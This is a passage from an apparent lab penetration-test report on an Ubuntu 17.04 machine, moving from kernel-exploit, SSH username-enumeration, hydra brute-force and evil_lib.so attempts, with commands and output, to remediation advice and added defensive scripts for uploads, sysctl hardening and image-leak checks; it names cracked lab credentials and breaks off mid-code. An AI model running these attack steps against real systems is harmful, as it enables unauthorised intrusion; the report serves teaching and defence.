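Both kernel searches on this page (the first under "Kernel" above, and this one) come down to the same question: does the running kernel fall inside the version range in a searchsploit title? The script below is an added example, not part of the original write-up or of searchsploit: it parses the range out of titles of the form `Linux Kernel [LO] < HI - ...` (the format assumed from the listings above) and reports the entries whose range contains the kernel from `uname -r`, plus the titles it could not parse so nothing is silently dropped. The embedded listing is a constructed subset of the searchsploit output above.

```python
"""Triage searchsploit output against a running kernel version.

Added example (not from the original write-up): parses the version range in
titles of the form "Linux Kernel [LO] < HI - ..." and reports entries whose
range contains the kernel reported by `uname -r`.  The sample below is a
constructed subset of the write-up's searchsploit listing."""
import re

# Optional lower bound, optional "/" separator, then "< HI".
TITLE_RE = re.compile(
    r"^Linux [Kk]ernel\s+(?:(?P<lo>\d[\w.]*)\s+)?(?:/\s+)?<\s+(?P<hi>\d[\w.-]*)"
)


def parse_version(text: str) -> tuple:
    """'4.10.0-19-generic' -> (4, 10, 0); '4.17-rc1' -> (4, 17); '4.14.rc3' -> (4, 14).
    Everything after the first '-' (build number, distro suffix, rc tag) and any
    non-numeric dotted component is dropped."""
    numeric = text.split("-")[0]
    return tuple(int(p) for p in numeric.split(".") if p.isdigit())


def title_range(title: str):
    """Return (lo, hi) version tuples for a parsable title, else None.
    An absent lower bound becomes the empty tuple, which sorts below everything."""
    m = TITLE_RE.match(title)
    if not m:
        return None
    lo = parse_version(m["lo"]) if m["lo"] else ()
    return lo, parse_version(m["hi"])


def triage(kernel_release: str, searchsploit_output: str):
    """Return (matches, unparsed): matches are (title, path) pairs whose range
    contains the kernel; unparsed are 'Linux ...' titles with no readable range."""
    running = parse_version(kernel_release)
    matches, unparsed = [], []
    for line in searchsploit_output.splitlines():
        title, sep, path = line.partition("|")
        title, path = title.strip(), path.strip()
        if not sep or not title.startswith("Linux"):
            continue  # table borders, header row, non-kernel entries
        bounds = title_range(title)
        if bounds is None:
            unparsed.append(title)
            continue
        lo, hi = bounds
        if lo <= running < hi:
            matches.append((title, path))
    return matches, unparsed


# Constructed subset of the write-up's searchsploit listing.
SAMPLE = """\
 Exploit Title                                   |  Path
------------------------------------------------- ---------------------
Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation | linux/local/50135.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation | linux/local/47163.c
Linux Kernel 4.10.5 / < 4.14.3 (Ubuntu) - DCCP Socket Use-After-Free | linux/dos/43234.c
Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation | linux/local/41886.c
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service | linux/dos/42136.c
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free | linux/dos/44579.c
"""

if __name__ == "__main__":
    matches, unparsed = triage("4.10.0-19-generic", SAMPLE)
    for title, path in matches:
        print(f"in range: {path}  {title}")
    for title in unparsed:
        print(f"could not parse range: {title}")
```

For `4.10.0-19-generic` this puts both 45010.c and 50135.c in range, and the write-up shows the first working and the second failing. That is the caveat to keep in mind: a title range is a patch-triage signal, not proof that a given distribution kernel (which may carry backported fixes and different build options) is actually exploitable. The `UDEV < 232` entry is reported as unparsed because its bound is a udev version, not a kernel version.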

#### Second one

Our Ubuntu version is `17.04`.

Let's try another exploit from Exploit-DB.

On the Exploit-DB website, let's search for `ubuntu 17.04`:

<figure><img src="/files/7zlWEVg9nGKryuU5DAZZ" alt=""><figcaption></figcaption></figure>

This is the exploit; let's check the code before we try it.

Let's now transfer it to the vulnerable machine.

On the attacker machine, let's open an HTTP server:

```
python3 -m http.server 8080
```

On the target machine, let's go to the `/tmp` directory.

```
cd /tmp
```

```
www-data@gamma:/tmp$ wget http://192.168.229.150:8080/exploit.c
wget http://192.168.229.150:8080/exploit.c
--2024-12-09 11:27:18--  http://192.168.229.150:8080/exploit.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 30153 (29K) [text/x-csrc]
Saving to: 'exploit.c'

exploit.c           100%[===================>]  29.45K  --.-KB/s    in 0s      

2024-12-09 11:27:18 (128 MB/s) - 'exploit.c' saved [30153/30153]

www-data@gamma:/tmp$ wget http://192.168.229.150:8080/la.c     
wget http://192.168.229.150:8080/la.c
--2024-12-09 11:27:35--  http://192.168.229.150:8080/la.c
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 761 [text/x-csrc]
Saving to: 'la.c'

la.c                100%[===================>]     761  --.-KB/s    in 0s      

2024-12-09 11:27:35 (204 MB/s) - 'la.c' saved [761/761]

www-data@gamma:/tmp$ ls
ls
exploit.c  la.c
www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
<o exploit -fno-stack-protector -z execstack -no-pie
exploit.c: In function 'main':
exploit.c:882:18: fatal error: la.so.h: No such file or directory
         #include "la.so.h"
                  ^~~~~~~~~
compilation terminated.
www-data@gamma:/tmp$ gcc -fpic -shared -nostdlib -Os -s -o la.so la.c
gcc -fpic -shared -nostdlib -Os -s -o la.so la.c
www-data@gamma:/tmp$ xxd -i la.so > la.so.h
xxd -i la.so > la.so.h
www-data@gamma:/tmp$ gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
<o exploit -fno-stack-protector -z execstack -no-pie

```

Note: ChatGPT helped with this command:

```
gcc exploit.c -o exploit -fno-stack-protector -z execstack -no-pie
```

Let's now run the exploit:

```
www-data@gamma:/tmp$ ./exploit 5 /bin/bash
./exploit 5 /bin/bash
Target 5 Ubuntu 17.04 (Zesty Zapus)
safe_stack_size 32768
origin /bin (4)
repl_max 20
num_important_hwcaps 23
max 24 ihcp 524288 ihcs 118784 len 131055 gpj 241952 gwr 61736 bwr 48527 cnt 6931 dst 8 repl 6
MIN_GAP 17314082816
copied 3 libs
try 1 5.930564 signal 13
try 2 1.049547 signal 13
try 3 0.998554 signal 13
try 4 1.016811 signal 13
try 5 0.995796 signal 13
try 6 0.963164 signal 13
try 7 0.968372 signal 13
try 8 1.004376 signal 13
try 9 1.020167 signal 13
try 10 1.002810 signal 13
try 11 1.000182 signal 13
try 12 0.977105 signal 13
try 13 1.018266 signal 13
try 14 1.001272 signal 13
try 15 0.924325 signal 13

```

Didn't work.

### Nessus Scan

<figure><img src="/files/EIFZEEQ3XL9UXKWl1PnW" alt=""><figcaption></figcaption></figure>

Let's specify the IP:

<figure><img src="/files/MnZnHXoeunGkBpVOIxNE" alt=""><figcaption></figcaption></figure>

Launching Scan:

<figure><img src="/files/ayQlNpQAFvkweMldQGuR" alt=""><figcaption></figcaption></figure>

Results:

<figure><img src="/files/BK3LprdC1OXBvAyNnUUp" alt=""><figcaption></figcaption></figure>

1- JQuery 1.2 < 3.5.0 Multiple XSS

<https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/>

<https://security.paloaltonetworks.com/PAN-SA-2020-0007>

2- SSH Terrapin Prefix Truncation Weakness (CVE-2023-48795)

<figure><img src="/files/kod471qJSfvfsK0jGysa" alt=""><figcaption></figcaption></figure>

<https://terrapin-attack.com/>

Those were the two main vulnerabilities found.

### Other Ports

#### SSH

**Scan:**

```
nmap -sV -p22 192.168.213.138
```

**Results:**

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:7F:C0:F0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

**Version:** OpenSSH 7.4p1 (Ubuntu 10). This is an older version of OpenSSH, and it may have known vulnerabilities.

**CVE-2018-15473**

This exploit targets the OpenSSH < 7.7 username enumeration flaw. Steps:

Let's download the exploit:

```
searchsploit -m 45233.py
```

Let's now create a Python virtual environment to install the dependencies:

```
python3 -m venv ~/myvenv
source ~/myvenv/bin/activate
pip install 
chmod +x 45233.py
```

Now, let's run the exploit to check whether www-data and root are valid users:

```
python3 45233.py 192.168.213.138 --username root
root is a valid user!
```

```
python3 45233.py 192.168.213.138 --username www-data
www-data is a valid user!
```

**Bruteforce SSH**

Since we now know that www-data and root are valid users, we'll run a brute-force attack on SSH:

```
hydra -l www-data -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138
```

Result:

```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 08:50:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.213.138:22/
[STATUS] 394.00 tries/min, 394 tries in 00:01h, 14344007 to do in 606:47h, 14 active
[STATUS] 309.00 tries/min, 927 tries in 00:03h, 14343478 to do in 773:40h, 10 active
[STATUS] 270.43 tries/min, 1893 tries in 00:07h, 14342512 to do in 883:57h, 10 active
[STATUS] 260.67 tries/min, 3910 tries in 00:15h, 14340495 to do in 916:55h, 10 active
[STATUS] 253.68 tries/min, 7864 tries in 00:31h, 14336541 to do in 941:55h, 10 active
[STATUS] 252.26 tries/min, 11856 tries in 00:47h, 14332549 to do in 946:58h, 10 active
[STATUS] 250.87 tries/min, 15805 tries in 01:03h, 14328600 to do in 951:55h, 10 active
[STATUS] 250.33 tries/min, 19776 tries in 01:19h, 14324629 to do in 953:44h, 10 active
```

Unfortunately, it didn't work on `www-data`.

Now, let's try `root`.

```
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.213.138
```

Result:

```
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-07 10:19:13
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.213.138:22/
[STATUS] 366.00 tries/min, 366 tries in 00:01h, 14344035 to do in 653:12h, 14 active
[STATUS] 365.00 tries/min, 1095 tries in 00:03h, 14343306 to do in 654:57h, 14 active
[STATUS] 345.00 tries/min, 2415 tries in 00:07h, 14341986 to do in 692:51h, 14 active
[STATUS] 345.40 tries/min, 5181 tries in 00:15h, 14339220 to do in 691:55h, 14 active
[STATUS] 332.32 tries/min, 10302 tries in 00:31h, 14334101 to do in 718:54h, 12 active
[STATUS] 319.66 tries/min, 15024 tries in 00:47h, 14329379 to do in 747:07h, 12 active
```

This didn't work either.

**OpenSSH < 6.6 SFTP - Command Execution**

We first check the exploit code. It needs a valid username and password for the target. Since we don't have them, we can't use this exploit.

**CVE-2016-10009**

Following the steps in the CVE:

Let's compile the code:

```
gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall
```

Let's connect to another machine using `ssh -A`. Then, on the remote machine:

```
ssh-add -s [...]/evil_lib.so
```

To do the above, I sent the code to the other machine through the exploited port 80 using http.server, so the compiled evil\_lib.so is now on the target machine.

```
www-data@gamma:/tmp$ ls
45010.c  45010.c.1  evil_lib.so  exploit  linpeas.out  linpeas.sh  tmux-33
```

Now we run the code as specified:

```
www-data@gamma:/tmp$ ssh-add -s /tmp/evil_lib.so 
Could not open a connection to your authentication agent.
```

It didn't work.

#### Port 5355

Looked for exploits of port 5355 on exploit-db. None found. Searched the web for "port 5355 vulnerabilities". No exploits found. Using searchsploit:

```
searchsploit llmnr 
Exploits: No Results 
Shellcodes: No Results
```

#### Port 68

* Looked for exploits of port 68 on exploit-db. None found.
* This might be relevant (source: <https://www.sonicwall.com/blog/cve-2018-1111-network-manager-command-injection-vulnerability>):

```
"SonicWall Threat Research Lab is seeing attempts to exploit the CVE-2018-1111 vulnerability - An OS command injection flaw in the Red Hat NetworkManager integration script included in its DHCP package. This is due to improper validation of DHCP responses by the Network Manager. Red Hat NetworkManager that's shipped by default with Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier are vulnerable to this flaw. A remote attacker could exploit this vulnerability by sending a malicious DHCP response to a vulnerable target.

The Dynamic Host Configuration Protocol (DHCP) is a network management protocol that issues DHCP requests to fetch network configurations such as IP address, Gateway, DNS servers and more. DHCP is implemented with two UDP port numbers (67 & 68). Port 67 is the destination port of a server and 68 is used by the client. A single DHCP transaction consists of several DHCP messages exchanged between the DHCP client and DHCP server. When a Network Manager receives a DHCP response with option records, DHCP client package provided by Red Hat for the NetworkManager component tries to read DHCP Option data for each of the record using the script and evaluates it to set the necessary environment variables. As the Option data is not properly sanitized, supplied arguments such as shell commands result in arbitrary command execution. Hence an attacker with a malicious DHCP server can spoof DHCP responses to vulnerable DHCP clients to execute arbitrary shell commands with root privileges."
```

Further examining this CVE, it specifically targets Red Hat-based distributions and their dhclient implementation. Ubuntu 10 (or any Debian-based distribution) does not use the same vulnerable script mechanism in dhclient, so this exploit would not work directly on Ubuntu 10.

Since we have access to the machine from exploiting port 80, I checked the version of dhclient to see what relevant vulnerabilities there are:

```
www-data@gamma:/tmp$ dhclient --version
isc-dhclient-4.3.5
```

Run searchsploit:

```
searchsploit dhclient 4.3.5
Exploits: No Results 
Shellcodes: No Results
```

## 5- Remediations and Recommendations for Machine Owner

### Passwords

#### What Makes a Password Strong?

In today's digital age, hackers have advanced tools that can crack weak passwords in seconds. To stay secure, your password needs to be unique, complex, and not tied to your personal information.

#### How to Create a Secure Password

* **Complexity is Key:**

  A strong password should have at least 16 characters, mixing uppercase and lowercase letters, numbers, and symbols. For example: `MySecureP@ssw0rd2024!`.

* **Avoid Personal Information:**

  Don't use your name, birthday, or anything linked to your identity. On the exploited machine, for example, the password was simply a name: "HusseinBakri".

* **Passphrases Work Wonders:**

  Use memorable yet random sentences. Instead of a random mix, try something like *"ILoveToTravelInItaly2024!"*. It's long, personal to your hobbies, and easy for you to recall but tough for hackers to guess.
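The rules above can be turned into a check that runs before a password is accepted. This is an added example, not code from the write-up: it applies the page's rules (at least 16 characters, all four character classes, no personal terms) and also looks the candidate up in a small constructed stand-in for a leaked-password list such as rockyou.txt, the list the brute-force attempts against this machine used.

```python
"""Check a candidate password against the rules given above (added example)."""
import string

# Constructed stand-in for a wordlist; a real deployment would load rockyou.txt
# or query a breach corpus instead.
COMMON_PASSWORDS = {"password", "123456", "qwerty", "letmein", "welcome1"}


def password_findings(password: str, personal_terms=()) -> list:
    """Return the list of rule violations; an empty list means the password passes."""
    findings = []
    if len(password) < 16:
        findings.append("shorter than 16 characters")
    classes = {
        "lowercase": any(c.islower() for c in password),
        "uppercase": any(c.isupper() for c in password),
        "digit": any(c.isdigit() for c in password),
        "symbol": any(c in string.punctuation for c in password),
    }
    missing = [name for name, present in classes.items() if not present]
    if missing:
        findings.append("missing character classes: " + ", ".join(missing))
    lowered = password.lower()
    if lowered in COMMON_PASSWORDS:
        findings.append("appears in a common-password list")
    # A name or date embedded in the password stays guessable, whatever the length.
    for term in personal_terms:
        if len(term) >= 4 and term.lower() in lowered:
            findings.append(f"contains personal term '{term}'")
    return findings


if __name__ == "__main__":
    # Personal terms are whatever is known about the account owner; these come from the write-up.
    personal = ("Hussein", "Bakri", "godofhacking")
    for candidate in ("HusseinBakri", "MySecureP@ssw0rd2024!", "ILoveToTravelInItaly2024!"):
        problems = password_findings(candidate, personal)
        print(f"{candidate!r}: {'OK' if not problems else '; '.join(problems)}")
```

The personal-term list is the part that needs real data: for a server account it should at least contain the owner's names, the hostname and the organisation name, since those are the first guesses an attacker makes.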

### Server-Side Fix to Prevent `.jpg.php` Uploads

1. **Server-Side File Type Validation**

   First, ensure that the backend performs strict validation of the uploaded file's MIME type. In the backend behind the jQuery form (written in PHP or Node.js, for example), detect the MIME type from the file's content to confirm the upload is indeed an image and not a disguised PHP script.

   Here's a basic example using PHP to validate uploaded files:

   ```php
   // Detect the MIME type from the uploaded file's content, not from the client-supplied name
   $fileMimeType = mime_content_type($_FILES['fileInput']['tmp_name']);

   // Only allow image MIME types
   $allowedMimeTypes = ['image/jpeg', 'image/png'];
   if (!in_array($fileMimeType, $allowedMimeTypes, true)) {
       die('Invalid file type. Only JPEG and PNG files are allowed.');
   }
   ```

2. **Check File Extensions and File Content**

   Don't rely only on the file extension (e.g., `.jpg.php`), as attackers can easily manipulate file names. Inspect the file's content as well: in our case the uploaded file was a reverse shell that gave us access to the machine, so if its content had been inspected, the risk of compromise would have been reduced. For instance, ensure that PHP scripts are not uploaded by checking the file content for a PHP open tag.

   Example in PHP:

   ```php
   $fileContent = file_get_contents($_FILES['fileInput']['tmp_name']);
   // Check for the full open tag and the short echo tag so neither form slips through
   if (stripos($fileContent, '<?php') !== false || strpos($fileContent, '<?=') !== false) {
       die('File contains PHP code. Upload rejected.');
   }
   ```

3. **Disable Script Execution in Upload Directory**

   Configure your server to disallow the execution of any PHP files in the upload directory; in our case, the uploaded reverse shell was executed from there. If you're using Apache, for example, add this to the upload directory's `.htaccess` file:

   ```apache
   # Block every request for a script file in this directory (a name ending in ".jpg.php" is matched too).
   # On Apache 2.4 the equivalent directive is: Require all denied
   <FilesMatch "\.(php|phar|phtml)$">
       Deny from all
   </FilesMatch>
   ```

   For Nginx, use the following in your configuration:

   ```nginx
   # "^~" stops nginx from handing /uploads/ to the site-wide PHP handler location,
   # so the nested rule is the one that applies. No blanket "deny all" on the prefix:
   # that would also block the legitimate images.
   location ^~ /uploads/ {
       location ~ \.(php|phar|phtml)$ {
           return 403;
       }
   }
   ```

4. **Set Proper File Permissions**

   Ensure that uploaded files have restrictive permissions so they can't be executed. For example:

   ```bash
   chmod 0644 /path/to/uploads/*
   ```

5. **Integrating with jQuery for Upload Handling**

   The jQuery code running in the browser adds a first layer of validation and filters out accidental bad uploads, but it runs on the client and can be bypassed, so it complements the server-side checks above rather than replacing them. Here's how you can modify the jQuery code to support secure file upload:

   ```javascript
   $(document).ready(function () {
       $('#uploadForm').on('submit', function (e) {
           let fileInput = $('#fileInput')[0].files[0];

           // Check if a file is selected
           if (!fileInput) {
               alert('Please select a file to upload.');
               e.preventDefault();
               return;
           }

           // Validate file extension
           let allowedExtensions = /(\.jpg|\.jpeg|\.png)$/i;
           if (!allowedExtensions.exec(fileInput.name)) {
               alert('Invalid file type. Please upload a .jpg or .png file.');
               e.preventDefault();
               return;
           }

           // Optional: File size limit (e.g., 2MB)
           if (fileInput.size > 2 * 1024 * 1024) {
               alert('File size exceeds the 2MB limit.');
               e.preventDefault();
               return;
           }

           alert('File validated. Uploading...');
       });
   });
   ```
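The five steps above are stronger taken together than any one of them alone. The following is an added example, not the write-up's or the target application's code, written in Python rather than the page's PHP so it runs stand-alone; the file names and byte strings are constructed samples. It rejects a script extension anywhere in the name (so both `shell.jpg.php` and `shell.php.jpg` fail), checks the leading bytes against the declared image type, refuses content containing a PHP open tag, enforces the same 2 MB limit as the jQuery code, and stores the file under a server-chosen name.

```python
"""Server-side upload validation combining the checks recommended above (added example)."""
import hashlib
import re

ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png"}
# Rejected if present as *any* extension component, which covers double extensions
# in both orders ("shell.jpg.php", "shell.php.jpg").
SCRIPT_EXTENSIONS = {"php", "phar", "phtml", "php3", "php4", "php5", "phps"}
MAX_SIZE = 2 * 1024 * 1024  # same 2 MB limit the jQuery code enforces client-side

# Leading bytes each declared type must start with; a content check, not a name check.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# PHP open tags, including the short echo form, matched case-insensitively.
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)

# Constructed samples: minimal image headers and a harmless PHP snippet.
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
JPEG_HEADER = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_SNIPPET = b"<?php echo 'constructed sample'; ?>"


def validate_upload(filename: str, content: bytes) -> tuple:
    """Return (accepted, reason); every check has to pass."""
    if len(content) > MAX_SIZE:
        return False, "file exceeds size limit"
    # Drop any directory part the client sent, then split on every dot.
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0] or not parts[-1]:
        return False, "missing file extension"
    extensions = parts[1:]
    if any(ext in SCRIPT_EXTENSIONS for ext in extensions):
        return False, "script extension present in file name"
    final_ext = extensions[-1]
    if final_ext not in ALLOWED_EXTENSIONS:
        return False, f"extension .{final_ext} not allowed"
    # The bytes must look like the image type the name claims.
    if not content.startswith(MAGIC[final_ext]):
        return False, "file content does not match declared image type"
    # A valid image header followed by PHP code (a polyglot) is still rejected.
    if PHP_TAG.search(content):
        return False, "file contains PHP code"
    return True, "ok"


def storage_name(content: bytes, ext: str) -> str:
    """Server-chosen name derived from the content hash; the client's name never reaches the disk."""
    return hashlib.sha256(content).hexdigest() + "." + ext


if __name__ == "__main__":
    cases = [
        ("photo.png", PNG_HEADER),
        ("shell.jpg.php", PHP_SNIPPET),              # the name pattern that compromised this machine
        ("shell.php.jpg", JPEG_HEADER),              # double extension the other way round
        ("photo.png", JPEG_HEADER),                  # name says PNG, bytes say JPEG
        ("polyglot.jpg", JPEG_HEADER + PHP_SNIPPET), # image header with PHP appended
    ]
    for name, data in cases:
        accepted, reason = validate_upload(name, data)
        print(f"{name:16} -> {'accepted' if accepted else 'rejected: ' + reason}")
```

Storing under a hash-derived name means the `.htaccess` and Nginx rules above become a second line of defence rather than the only one: even if a check is bypassed, nothing in the upload directory ever carries a name the attacker picked.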

### Steps to Prevent Privilege Escalation:

1. **Upgrade the Operating System:**

   - Ubuntu 17.04 (the OS of the exploited machine) reached its **end of life (EOL)** in January 2018, meaning it no longer receives security updates.
   - **Action:** Upgrade to a currently supported version of Ubuntu (e.g., Ubuntu 22.04 LTS or later).
   - **Why:** Supported versions receive regular updates, patching critical vulnerabilities automatically.

2. **Keep the System Updated:**

   - Regularly apply updates using the following commands:

     ```bash
     sudo apt update
     sudo apt upgrade -y
     sudo apt dist-upgrade -y
     ```

3. **Upgrade the Kernel:**

   The privilege escalation step was performed with a kernel exploit; it worked because the kernel was not up to date and therefore still exposed a known vulnerability.

   Consider upgrading the Linux kernel to a more secure and supported version:

   ```bash
   sudo apt install --install-recommends linux-generic-hwe-22.04
   ```

4. **Implement Security Best Practices:**

   - **Enable Automatic Security Updates:**

     ```bash
     sudo apt install unattended-upgrades
     sudo dpkg-reconfigure -plow unattended-upgrades
     ```

   - **Limit Privileged Access:**
     - Review user accounts with administrative privileges.
     - Use **sudo** responsibly and restrict administrative commands.

5. **Enable Kernel Hardening:**

   - Use the following security modules:
     - **AppArmor:** Pre-installed in Ubuntu, enforce it with:

       ```bash
       sudo systemctl enable apparmor
       sudo systemctl start apparmor
       ```

     - **SELinux:** Consider using SELinux for additional protection.

   - Enable key kernel protection settings in `/etc/sysctl.conf` (comments go on their own lines; sysctl does not strip a trailing comment from a value):

     ```
     # Enable full Address Space Layout Randomization (ASLR)
     kernel.randomize_va_space=2
     # Hide kernel pointers
     kernel.kptr_restrict=2
     ```

6. **Apply Mandatory Access Control (MAC) Policies:**

   - Implement restrictive permissions using tools like AppArmor, SELinux, or Grsecurity. Every access then requires an explicit permission, which reduces the chance of an attacker taking over a session directly, as we did in our exploit.
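The sysctl settings in step 5 are easy to set once and then lose to a later change, so they are worth auditing. The following is an added example, not from the write-up: it parses the `key = value` lines that `sysctl -a` prints (the same syntax `/etc/sysctl.conf` uses) and lists every recommended setting that is missing or weaker than the value given above. The sample output it checks is constructed.

```python
"""Audit the kernel hardening settings recommended above against what a host reports (added example)."""

# Minimum values recommended in the section above; for both keys a higher value is stricter.
EXPECTED = {
    "kernel.randomize_va_space": 2,  # full ASLR (stack, mmap, brk)
    "kernel.kptr_restrict": 2,       # kernel pointers hidden from all users
}

# Constructed sample of `sysctl -a` output from a weakly configured host, trimmed to three keys.
SAMPLE_SYSCTL_OUTPUT = """\
kernel.hostname = gamma
kernel.randomize_va_space = 1
kernel.kptr_restrict = 0
"""


def parse_sysctl(text: str) -> dict:
    """Map sysctl keys to their raw string values.

    Only lines that start with '#' or ';' are comments, which is how sysctl(8) reads
    /etc/sysctl.conf; a trailing '# comment' on a value line would become part of the value.
    """
    settings = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;" or "=" not in stripped:
            continue
        key, _, value = stripped.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def check_hardening(settings: dict, expected: dict = EXPECTED) -> list:
    """Return (key, found, minimum) for every key that is absent, non-numeric or below the minimum."""
    findings = []
    for key, minimum in expected.items():
        raw = settings.get(key)
        try:
            value = int(raw)
        except (TypeError, ValueError):
            findings.append((key, raw, minimum))
            continue
        if value < minimum:
            findings.append((key, value, minimum))
    return findings


def render_fix(findings: list) -> str:
    """Produce the /etc/sysctl.conf lines that correct the reported findings."""
    return "".join(f"{key}={minimum}\n" for key, _found, minimum in findings)


if __name__ == "__main__":
    # On a real host, feed in the output of `sysctl -a` instead of the constructed sample.
    found = check_hardening(parse_sysctl(SAMPLE_SYSCTL_OUTPUT))
    for key, value, minimum in found:
        print(f"{key}: found {value!r}, expected at least {minimum}")
    print("--- lines to add to /etc/sysctl.conf ---")
    print(render_fix(found), end="")
```

Running the check against `sysctl -a` rather than against the config file is deliberate: it reports the values the kernel is actually using, so a setting that was written to the file but never loaded with `sysctl -p` still shows up as a finding.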

**Business Impact**

Failing to address outdated operating systems and kernels could lead to severe data breaches, ransomware attacks, and compliance violations. Upgrading ensures a more secure, stable environment with reduced attack surfaces.

**Priority: High**

Due to the critical nature of kernel exploitation vulnerabilities, immediate action is required to prevent potential compromises.

### Preventing Information Leaks from Image Files

1. **Avoid Embedding Sensitive Data in Media Files**

   - Refrain from embedding sensitive data such as credentials, personal details, or secret keys within image files or other media. Instead, use secure storage mechanisms specifically designed for sensitive data. On the exploited machine, the image OdinHiddenKnowledge.png was used to gather username and password information, from which we concluded that the username is "godofhacking" and the password is "HusseinBakri".
   - **Why:** Hidden data can be extracted using steganographic analysis tools like `zsteg`, potentially exposing critical information (as we did on the exploited machine).

2. **Scrub Metadata Before Sharing Files**

   - Remove metadata from images using tools such as **ExifTool** to prevent information leaks, including file creator details, GPS coordinates, and device information.
   - **Example Command:**

     ```bash
     exiftool -all= filename.png
     ```

   - **Why:** Metadata often contains sensitive information that could be used for reconnaissance or targeted attacks.

3. **Use Encryption for Sensitive Data Storage**

   - If hiding information in files is unavoidable, ensure it is securely encrypted using strong encryption algorithms (e.g., AES-256) and that access is restricted.
   - **Why:** Encryption ensures that even if data is extracted, it cannot be accessed without decryption keys.

4. **Conduct Regular Security Assessments**

   - Perform regular security assessments, including file content analysis, metadata inspection, and steganographic testing, to detect and mitigate potential hidden data leaks, so that the information leakage seen on the exploited machine cannot happen again.
   - **Why:** Continuous monitoring helps identify vulnerabilities before they can be exploited.

5. **Employee Awareness and Training**

   - Educate employees and collaborators about the risks of embedding or inadvertently leaving sensitive information in image files. Include security best practices in onboarding and ongoing training sessions.
   - **Why:** Human error is a leading cause of data exposure. Training reduces this risk by fostering security awareness. On the exploited machine, too, the leak may well have been a human error: someone forgot to remove the useful information.
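The "file content analysis" in step 4 can start with checks that need no steganography tool at all. The following is an added example, not the write-up's code: it walks a PNG's chunk list and reports the two simplest hiding places, text chunks (`tEXt`, `zTXt`, `iTXt`) and bytes appended after the `IEND` chunk, plus CRC mismatches that indicate a chunk was edited by hand. It does not inspect pixel bit planes, which is what `zsteg` does. The PNG it inspects is built in memory and is a constructed sample, not OdinHiddenKnowledge.png.

```python
"""Report text chunks, CRC errors and trailing data in a PNG (added example)."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one chunk: big-endian length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(hide_data: bool = True) -> bytes:
    """A valid 1x1 RGB PNG; with hide_data it also carries text chunks and a trailer (constructed)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, colour type RGB
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")      # filter byte + one black pixel
    body = _chunk(b"IHDR", ihdr)
    if hide_data:
        body += _chunk(b"tEXt", b"Comment\x00constructed sample: login hint")
        body += _chunk(b"zTXt", b"Note\x00\x00" + zlib.compress(b"compressed note"))
    body += _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")
    png = PNG_SIGNATURE + body
    return png + b"data appended after IEND" if hide_data else png


def _decode_text(ctype: bytes, data: bytes) -> tuple:
    """Return (keyword, text) for a tEXt, zTXt or iTXt chunk."""
    keyword, _, rest = data.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        text = zlib.decompress(rest[1:])      # rest[0] is the compression method byte
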